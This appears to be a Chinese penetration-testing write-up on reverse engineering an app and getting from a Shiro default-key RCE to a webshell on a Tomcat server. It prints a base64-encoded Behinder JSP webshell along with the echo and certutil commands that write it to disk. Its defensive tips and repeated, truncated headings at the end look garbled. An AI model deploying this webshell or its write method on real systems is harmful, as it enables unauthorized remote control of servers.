APP逆向与渗透测试实战：从逆向分析到获取Shell<\/h1>

1. 前言与背景<\/h2>
本次渗透测试目标是一个仅包含登录框的APP，该登录框调用公司门户站的SSO单点登录系统，并受到长亭WAF保护。常规渗透测试方法难以突破，因此转向APP逆向分析寻找突破口。<\/p>

2. 逆向分析准备<\/h2>

2.1 工具准备<\/h3>

反编译工具<\/strong>：jadx（用于反编译APK）<\/li>
脱壳工具<\/strong>：反射大师（用于处理爱加密加固）<\/li>
信息搜集工具<\/strong>：AppInfoScanner（扫描APP中的URL信息）<\/li>

抓包工具<\/strong>：配合Hook绕过反抓包机制<\/li> <\/ul>
2.2 初步逆向分析<\/h3>

使用jadx反编译APK，发现存在爱加密加固<\/li>
使用反射大师进行脱壳，获取原始dex文件<\/li>
再次使用jadx分析脱壳后的代码<\/li>
发现使用okhttp框架，存在反抓包机制<\/li> <\/ol>
3. 寻找突破口<\/h2>
3.1 URL信息搜集<\/h3>

在BaseUrlConfig<\/code>类中发现一组IP地址（相同IP不同端口）<\/li>
使用AppInfoScanner主动扫描获取更多URL信息<\/li>
全局搜索http:\/\/<\/code>关键词，发现更多URL<\/li> <\/ol> 3.2 测试发现的URL<\/h3> 访问IP地址，发现空白页面但显示Tomcat图标<\/li> 发现类似http:\/\/xxxxx:8080\/web\/weixin\/xxxxxx<\/code>的URL<\/li> 基于"weixin"关键词猜测路径，尝试\/web\/weixin\/login<\/code><\/li> 成功发现登录页面<\/li> <\/ol> 4. 漏洞利用<\/h2> 4.1 Shiro漏洞利用<\/h3> 根据URL特征推测后端为Java<\/li> 尝试Shiro默认密钥进行RCE攻击<\/li> 成功获取系统权限的远程代码执行能力<\/li> <\/ol> 5. 写入Webshell的挑战与解决方案<\/h2> 5.1 初始尝试方法<\/h3> 方法一<\/strong>：echo写入（需转义特殊字符）<\/p> JSP马特殊字符多，转义复杂<\/li> 本地测试成功但目标环境失败（编码问题）<\/li> <\/ul> <\/li> 方法二<\/strong>：Base64解码写入<\/p> 使用certutil -decode<\/code>命令<\/li> 本地成功但目标环境解码失败（输出长度为0）<\/li> <\/ul> <\/li> <\/ol> 5.2 Fuzz测试发现问题<\/h3> 分段Base64编码上传测试<\/li> 发现冰蝎马的最后四个字符;}%><\/code>导致解码失败<\/li> 解决方案：先写入除最后四个字符外的内容<\/li> 再单独追加最后四个字符<\/li> <\/ul> <\/li> <\/ol> 5.3 写入命令示例<\/h3> echo<\/span> PCVAcGFnZSBpbXBvcnQ9ImphdmEudXRpbC4qLGphdmF4LmNyeXB0by4qLGphdmF4LmNyeXB0by5zcGVjLioiJT48JSFjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXJ7VShDbGFzc0xvYWRlciBjKXtzdXBlcihjKTt9cHVibGljIENsYXNzIGcoYnl0ZSBbXWIpe3JldHVybiBzdXBlci5kZWZpbmVDbGFzcyhiLDAsYi5sZW5ndGgpO319JT48JWlmIChyZXF1ZXN0LmdldE1ldGhvZCgpLmVxdWFscygiUE9TVCIpKXtTdHJpbmcgaz0iZTQ1ZTMyOWZlYjVkOTI1YiI7c2Vzc2lvbi5wdXRWYWx1ZSgidSIsayk7Q2lwaGVyIGM9Q2lwaGVyLmdldEluc3RhbmNlKCJBRVMiKTtjLmluaXQoMixuZXcgU2VjcmV0S2V5U3BlYyhrLmdldEJ5dGVzKCksIkFFUyIpKTtuZXcgVSh0aGlzLmdldENsYXNzKCkuZ2V0Q2xhc3NMb2FkZXIoKSkuZyhjLmRvRmluYWwobmV3IHN1bi5taXNjLkJBU0U2NERlY29kZXIoKS5kZWNvZGVCdWZmZXIocmVxdWVzdC5nZXRSZWFkZXIoKS5yZWFkTGluZSgpKSkpLm5ld0luc3RhbmNlKCkuZXF1YWxzKHBhZ2VDb250ZXh0KQ>1.txt <\/span><\/span>certutil -decode 1.txt 2.jsp <\/span><\/span>echo<\/span> ;}%> >> 2.jsp <\/span><\/span><\/code><\/pre>5.4 路径问题解决<\/h3> 初始写入根目录不解析（变为下载）<\/li> 解决方案：写入Tomcat自带目录（如docs目录）<\/li> <\/ol> 6. 经验总结<\/h2> 环境差异<\/strong>：本地测试成功不代表目标环境能成功<\/li> Fuzz测试<\/strong>：遇到问题时分段测试是有效方法<\/li> 备选方案<\/strong>：内存马注入可作为最后手段（但可能导致服务崩溃）<\/li> 资产确认<\/strong>：确保攻击的是正确目标（本例中打到其他业务服务器）<\/li> <\/ol> 7. 防御建议<\/h2> 加固防护<\/strong>：<\/p> 避免使用默认密钥<\/li> 及时更新框架和组件<\/li> <\/ul> <\/li> 敏感信息管理<\/strong>：<\/p> 不要在客户端存储敏感URL<\/li> 使用混淆和加密保护配置信息<\/li> <\/ul> <\/li> 输入验证<\/strong>：<\/p> 严格过滤特殊字符<\/li> 限制命令执行功能<\/li> <\/ul> <\/li> 监控措施<\/strong>：<\/p> 监控异常文件创建<\/li> 检测异常命令执行<\/li> <\/ul> <\/li> <\/ol> 8. 工具与资源<\/h2> 逆向工具<\/strong>：<\/p> jadx<\/li> 反射大师<\/li> Frida（用于Hook）<\/li> <\/ul> <\/li> 扫描工具<\/strong>：<\/p> AppInfoScanner<\/li> MobSF<\/li> <\/ul> <\/li> 漏洞利用工具<\/strong>：<\/p> Shiro反序列化利用工具<\/li> ysoserial<\/li> <\/ul> <\/li> Webshell管理<\/strong>：<\/p> 冰蝎<\/li> 哥斯拉<\/li> AntSword<\/li> <\/ul> <\/li> <\/ol>

APP逆向与渗透测试实战：从逆向分析到获取Shell<\/h1>

1. 前言与背景<\/h2> 本次渗透测试目标是一个仅包含登录框的APP，该登录框调用公司门户站的SSO单点登录系统，并受到长亭WAF保护。常规渗透测试方法难以突破，因此转向APP逆向分析寻找突破口。<\/p>

2. 逆向分析准备<\/h2>

3. 寻找突破口<\/h2>

4. 漏洞利用<\/h2>

5. 写入Webshell的挑战与解决方案<\/h2>

1. 前言与背景<\/h2>
本次渗透测试目标是一个仅包含登录框的APP，该登录框调用公司门户站的SSO单点登录系统，并受到长亭WAF保护。常规渗透测试方法难以突破，因此转向APP逆向分析寻找突破口。<\/p>